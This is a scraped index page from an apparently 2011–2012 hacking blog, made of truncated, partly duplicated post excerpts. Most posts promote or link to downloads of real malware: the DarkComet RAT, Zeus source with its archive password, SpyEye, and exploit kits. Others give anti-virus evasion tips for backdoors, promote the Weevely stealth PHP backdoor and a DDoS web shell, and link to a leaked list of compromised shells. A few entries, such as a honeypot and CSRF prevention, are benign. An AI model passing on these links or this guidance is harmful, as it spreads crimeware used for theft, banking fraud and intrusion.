This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)
So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/
Showing posts with label bot. Show all posts
Showing posts with label bot. Show all posts
Saturday, 7 July 2012
DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1
Labels:
backdoor,
bot,
dos,
exploitation,
Hacking,
hacking tool,
Information Security,
Microsoft,
pentest,
security,
Source,
tool,
trick,
trojan
Monday, 25 June 2012
BoNeSi - the DDoS Botnet Simulator
If you want to see demo video of this tool, please go to the Source.
BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly
BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly
Labels:
bot,
Crack,
Defensive,
exploitation,
forensics,
Hacking,
hacking tool,
Information Security,
Network Security,
packet analysis,
pentest,
security,
tool
Thursday, 29 December 2011
Ultimate Encoder - PHP Encoder with multiple compression by lionaneesh
Ultimate Encoder" - Another Online tool by lionaneesh,
an Indian developer and Hacker. Its a PHP Encoder with multiple
compression. A Piece of code can be encoded multiple times making it
impossible for any Anti Virus to detect it
Source: http://thehackernews.com/2011/12/ultimate-encoder-php-encoder-with.html
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar
an Indian developer and Hacker. Its a PHP Encoder with multiple
compression. A Piece of code can be encoded multiple times making it
impossible for any Anti Virus to detect it
Source: http://thehackernews.com/2011/12/ultimate-encoder-php-encoder-with.html
If you like my blog, Please Donate Me
One Dollar $1.00 Two Dollar
Labels:
backdoor,
bot,
Crack,
Defensive,
deobfuscate,
exploitation,
Hacking,
hacking tool,
Information Leak,
Information Security,
linux,
metasploit,
Network Security,
pentest,
security,
Source,
tool,
trick,
Web
Thursday, 20 October 2011
Howto: Create And Control ZEUS Bot.
So today we are going to learn another botnet, THE ZEUS BOT, yes you read it correct.
I don't think that you may not have heard about Zeus, it's one of the most dangerous bot in the world.
But why I'm showing it??
Because I want you to learn the most hazardous attacks of the world, not just hacking with some tools like
skr!p7 k!dd!3s....I want you to be a proffessional, not a hacker.
You can
I don't think that you may not have heard about Zeus, it's one of the most dangerous bot in the world.
But why I'm showing it??
Because I want you to learn the most hazardous attacks of the world, not just hacking with some tools like
skr!p7 k!dd!3s....I want you to be a proffessional, not a hacker.
You can
Labels:
article,
bot,
dos,
Hacking,
hacking tool,
howto,
Information Security,
Network Security,
packet analysis,
pentest,
security,
shell,
Web,
Web Application,
Web Application Attack
Preventing CSRF With Ajax
You can try to apply the ValidateAntiForgeryTokenAttribute attribute to an action
method, but it will fail every time if you try to post JSON encoded data to the
action method. On one hand, the most secure action possible is one that rejects
every request. On the other hand, that’s a lousy user experience.
The problem lies in the fact that the under the hood, deep within the call
stack, the
Labels:
article,
bot,
dos,
Hacking,
hacking tool,
howto,
Information Security,
Network Security,
packet analysis,
pentest,
security,
shell,
Web,
Web Application,
Web Application Attack
Wednesday, 19 October 2011
Kippo The SSH Honeypot
Kippo is a medium interaction SSH honeypot designed to
log brute force attacks and, most importantly, the entire shell
interaction performed by the attacker.
How to run it?
Edit kippo.cfg to your liking and start the honeypot by running:
./start.sh
start.sh
is a simple shell script that runs Kippo in the background using
twistd. Detailed startup options can be given by running twistd
Labels:
article,
bot,
dos,
Hacking,
hacking tool,
howto,
Information Security,
Network Security,
packet analysis,
pentest,
security,
shell,
Web,
Web Application,
Web Application Attack
Friday, 14 October 2011
Create Backdoor With Evading Antivirus
If you want to see full detail, please go to the Source.
TIP #1: Do your reconnaissance. Know what antivirus software target
system personnel are running. While it is certainly possible to make a
backdoor that evades all antivirus software products, there is no need
to waste those cycles if your target is only running one product, a
significant likelihood. Narrow down your options by
Labels:
article,
bot,
dos,
Hacking,
hacking tool,
howto,
Information Security,
Network Security,
packet analysis,
pentest,
security,
shell,
Web,
Web Application,
Web Application Attack
Monday, 10 October 2011
WebCookiesSniffer - New cookies sniffer/viewer utility
WebCookiesSniffer
is a new packet sniffer utility that captures all web site cookies sent
between the web browser and the web server and displays them in a
simple cookies table. The upper pane of WebCookiesSniffer displays the
cookie string and the web site/host name that sent or received this
cookie. When selecting a cookie string in the upper pane,
WebCookiesSniffer parses the cookie
Labels:
article,
bot,
dos,
Hacking,
hacking tool,
howto,
Information Security,
linux,
Microsoft,
Network Security,
packet analysis,
pentest,
security,
shell,
Web,
Web Application,
Web Application Attack
MSFConsole Prompt Fiddling
Metasploit has multiple ways of
creating logs:
cat ~/.msf4/logs/framework.log
This log automatically logs all of the error data that is great for
trouble shooting when something is working, but doesn't record what you
are doing inside of msfconsole
msf> spool ~/myclient.log
The spool command is great for logging output
Labels:
article,
bot,
dos,
Hacking,
hacking tool,
howto,
Information Security,
linux,
metasploit,
Network Security,
packet analysis,
pentest,
security,
shell,
Web,
Web Application,
Web Application Attack
Weevely create and manage PHP trojan designed to be hardly detectable
This
software is a proof of concept of an unobtrusive PHP backdoor that
simulate a complete telnet-like connection, hidden datas in HTTP
referers and using a dynamic probe of system-like functions to bypass
PHP security restrictions.
Usage:
Select All Code:
root@bt:/weevely# ./main.py -h
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely
Labels:
article,
bot,
dos,
Hacking,
hacking tool,
howto,
Information Security,
Network Security,
packet analysis,
pentest,
security,
shell,
Web,
Web Application,
Web Application Attack
Gateway-finder [ Scapy Script find Gateway IP in the LAN]
Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.
This can be useful during Internal pentests when you want to quickly check for unauthorised routes to the Internet (e.g. rogue wireless access points) or routes to other Internal LANs. It doesn't perform a hugely thorough check, but it
This can be useful during Internal pentests when you want to quickly check for unauthorised routes to the Internet (e.g. rogue wireless access points) or routes to other Internal LANs. It doesn't perform a hugely thorough check, but it
Labels:
article,
bot,
dos,
Hacking,
hacking tool,
howto,
Information Security,
Network Security,
packet analysis,
pentest,
security,
shell,
Web,
Web Application,
Web Application Attack
Monday, 3 October 2011
Cracking MD5/SHA1 Hash In The Cloud
Welcome to CloudCracker.net, your FREE online MD5/SHA1 hash
cracker/generator. Simply paste an MD5 hash or a SHA1 hash you want to
crack or a word you want to hash into the box and hit the button. Our
funky system will auto-detect what you've entered and hash/crack it
accordingly.
Source: http://www.cloudcracker.net/
If you like my blog, Please Donate Me
One Dollar $1.00 Two
cracker/generator. Simply paste an MD5 hash or a SHA1 hash you want to
crack or a word you want to hash into the box and hit the button. Our
funky system will auto-detect what you've entered and hash/crack it
accordingly.
Source: http://www.cloudcracker.net/
If you like my blog, Please Donate Me
One Dollar $1.00 Two
Labels:
bot,
Brute Force,
Brute Force Tool,
Crack,
exploitation,
Hacking,
hacking tool,
html5,
Information Leak,
Information Security,
password,
security,
Source,
tool
Sunday, 21 August 2011
DarkComet-RAT v.4.0(fix1) Was Release
DarkComet-RAT v4.0 Change log
- DarkComet-RAT is now compiled on Delphi XE instead of Delphi 2010.
- Synthax highlighter added in remote keylogger.
- Multithreading is now more efficient, no more freezing, using a new powerfull and stable methode (still using pure Win32 API both side for it)
- Get hard drive information added in file manager
- Bot logs in main form had change, it is more
- DarkComet-RAT is now compiled on Delphi XE instead of Delphi 2010.
- Synthax highlighter added in remote keylogger.
- Multithreading is now more efficient, no more freezing, using a new powerfull and stable methode (still using pure Win32 API both side for it)
- Get hard drive information added in file manager
- Bot logs in main form had change, it is more
Labels:
backdoor,
bot,
exploitation,
Hacking,
hacking tool,
Information Leak,
Information Security,
password,
pentest,
security,
Source,
tool
Thursday, 11 August 2011
SpyEye 1.3.45 Download - Loader source code was release
A new fresh and sophisticated web-based bot named SpyEye is around in the markets and looks like to be the possible successor of the famous Zeus Trojan due to its very interesting features, with the main objective to steal bank accounts, credit cards, ftp accounts and other sensitive data from the victim’s computer.SpyEye was written in C++ and the size of the compiled binary is of 60
Labels:
backdoor,
bot,
Crack,
exploitation,
Hacking,
hacking tool,
Information Security,
security,
tool
Sunday, 26 June 2011
AnonOps Shell List Leaked
I don't want to explain anything about it, please take a look by yourself.
View: http://pastebin.com/ZDyb4UM5
Download: http://www.wupload.com/file/34529452/AnonOps_Shell_List_Leaked.docx
View: http://pastebin.com/ZDyb4UM5
Download: http://www.wupload.com/file/34529452/AnonOps_Shell_List_Leaked.docx
Labels:
article,
bot,
Hacking,
hacking tool,
Information Leak,
Information Security,
security,
Web,
Web Application
Wednesday, 8 June 2011
Ani-Shell: Mass Mailer, Web-Server Fuzzer, DDoser
Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , and a DDoser!
Features of Ani-Shell
Shell
Plateform Independent
Mass – Mailer
Small Web-Server Fuzzer
DDoser
Design
Source: http://www.pentestit.com/2011/06/08/anishell-mass-mailer-webserver-fuzzer-ddoser/
Features of Ani-Shell
Shell
Plateform Independent
Mass – Mailer
Small Web-Server Fuzzer
DDoser
Design
Source: http://www.pentestit.com/2011/06/08/anishell-mass-mailer-webserver-fuzzer-ddoser/
Labels:
bot,
Hacking,
hacking tool,
Information Security,
security,
Web,
Web Application,
Web Application Attack
Wednesday, 1 June 2011
Malware List In My Blog
You can download here, but please don't use in illegal. Phoenix exploit kit 2.5 impassioned Framework Blackhole Exploit Kit Unknown Exploit Kit Zeus 2.5 Source Code [password: zeus]
Labels:
bot,
Hacking,
hacking tool,
Information Leak,
Information Security,
security,
Source,
Vulnerability
Thursday, 26 May 2011
Phoenix exploit kit 2.5 leaked, Download Now !
The latest version of the Phoenix Exploit Kit currently has payloads for nine different system configurations, including:
* XPIE7: Internet Explorer 7 and either Windows XP, Windows XP SP2, or Windows 2003
* VISTAIE7: Internet Explorer 7 and Windows Vista
* XPIE8: Internet Explorer 8 and either Windows XP, Windows XP SP2, or Windows 2003
* VISTAIE8: Internet Explorer 8 and
* XPIE7: Internet Explorer 7 and either Windows XP, Windows XP SP2, or Windows 2003
* VISTAIE7: Internet Explorer 7 and Windows Vista
* XPIE8: Internet Explorer 8 and either Windows XP, Windows XP SP2, or Windows 2003
* VISTAIE8: Internet Explorer 8 and
Labels:
backdoor,
bot,
Crack,
exploitation,
Hacking,
hacking tool,
Information Leak,
Information Security,
security,
Source,
tool,
Vulnerability
Monday, 23 May 2011
impassioned Framework, New Exploit Kit was released now.
The another exploit kit was public and download free again. Try it by yourselves but use to learning only.
Download: http://www.multiupload.com/9ELC2CART6
Or
http://www.wupload.com/file/4411707/impassioned_FrameShit.rar
Source: http://www.thehackernews.com/2011/05/impassioned-framework-download-another.html
Download: http://www.multiupload.com/9ELC2CART6
Or
http://www.wupload.com/file/4411707/impassioned_FrameShit.rar
Source: http://www.thehackernews.com/2011/05/impassioned-framework-download-another.html
Labels:
backdoor,
bot,
Crack,
exploitation,
Hacking,
hacking tool,
Information Security,
security,
tool,
trojan
Howto: Setup Zeus as a hidden service.
Untitled from drebin on Vimeo.
Source: http://vimeo.com/20854260
Source: http://vimeo.com/20854260
Labels:
article,
backdoor,
bot,
exploitation,
Hacking,
howto,
Information Security,
linux,
Microsoft,
security,
trojan
Subscribe to:
Posts (Atom)